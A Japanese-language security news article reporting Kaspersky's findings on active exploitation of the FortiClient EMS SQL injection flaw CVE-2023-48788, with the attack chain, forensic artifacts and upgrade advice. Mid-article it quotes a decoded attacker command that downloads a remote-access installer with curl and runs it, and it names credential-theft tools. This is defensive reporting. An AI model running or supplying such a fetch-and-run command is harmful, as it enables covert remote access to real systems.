Kaspersky Uncovers Active Exploitation of Fortinet Vulnerability CVE-2023-48788
2024/12/19 SecurityOnline — Fortinet FortiClient EMS におけるパッチ適用済みの脆弱性が、積極的に悪用されていることが、Kaspersky の Global Emergency Response Team (GERT) の最新調査で発見された。この、SQL インジェクションの脆弱性 CVE-2023-48788 は、FortiClient EMS バージョン 7.0.1 ~ 7.0.10 および 7.2.0 ~ 7.2.2 に影響を及ぼす。すでにパッチは提供されているが、更新されていないシステムを悪用し続ける攻撃者は、不正なコード実行やネットワーク侵害を達成している。
Kaspersky のレポートによると、SQL コマンド入力に対する不適切なフィルタリングにより、この脆弱性は発生する。攻撃者は、特別に細工されたパケットを送信することで、不正なコマンドを実行できる。インターネットに公開されている Windows サーバ上に、この脆弱性が存在する場合には、きわめて危険な状態にある。なぜなら、従業員たちへの安全な VPN アクセスの提供といった、重要なビジネス機能の役割を、これらのシステムが果たすケースが多いからである。
一般的な攻撃シーケンスは、この脆弱性を悪用することで、AnyDesk や ScreenConnect などの RMM (remote monitoring and management) ツールを展開するところから始まる。それにより、脅威アクターはネットワーク内に足場を築き、さらなるアクティビティとして、認証情報の盗難/横方向の移動/防御の回避などを可能にしていく。
この脆弱性の悪用は 2024年10月に発生し、侵害された Windows サーバの管理者アカウントを介した、レジストリ・ハイブへの不正アクセスの試みが、テレメトリ・アラートにより明らかになったと、Kaspersky GERT のアナリストたちは述べている。
そして、調査の結果により、攻撃者は Base64 でエンコードされたペイロードと curl や certutil などのツールを使用し、悪意のインストーラーをダウンロードしたことが明らかになった。
攻撃者のスクリプトからデコードされた。注目すべきコマンドには以下のものがある。
curl -o C:\update.exe "https://infinity.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe" & start /B C:\update.exe
さまざまな地域の組織を標的にするたびに、この攻撃者は適応性を示していたが、その標的は南米に集中していた。また、”webhook.site” などのプラットフォームを活用して、脆弱なシステムからレスポンス収集するという戦術も採用されていた。
調査中に特定された主なアーティファクトには、以下のものが含まれる:
- SQL インジェクションの試行を示す、”ems.log”/”sql_trace.log” 内の疑わしいエントリ。
- mimikatz.exe や webbrowserpassview.exe などの、認証情報収集ツールの使用の証拠。
- 以前に発生した悪意のキャンペーンに関連付けられる、IP アドレスへとトレースされた外部サーバへの接続。
GERT の調査結果が強調するのは、FortiClient EMS のバージョンを、7.0.11~7.0.13 または 7.2.3 以降へとアップグレードする必要性である。
この、SQL インジェクションの脆弱性 CVE-2023-48788 ですが、お隣のキュレーション・チームに聞いてみたところ、最初のレポートは 3月14日のことであり、3月25日には CISA KEV に登録されているとのことでした。その後も、6月と 9月に情報が加えられているようです。よろしければ、CVE-2023-48788 で検索も、ご参照ください。
IoT OT Security News 
You must be logged in to post a comment.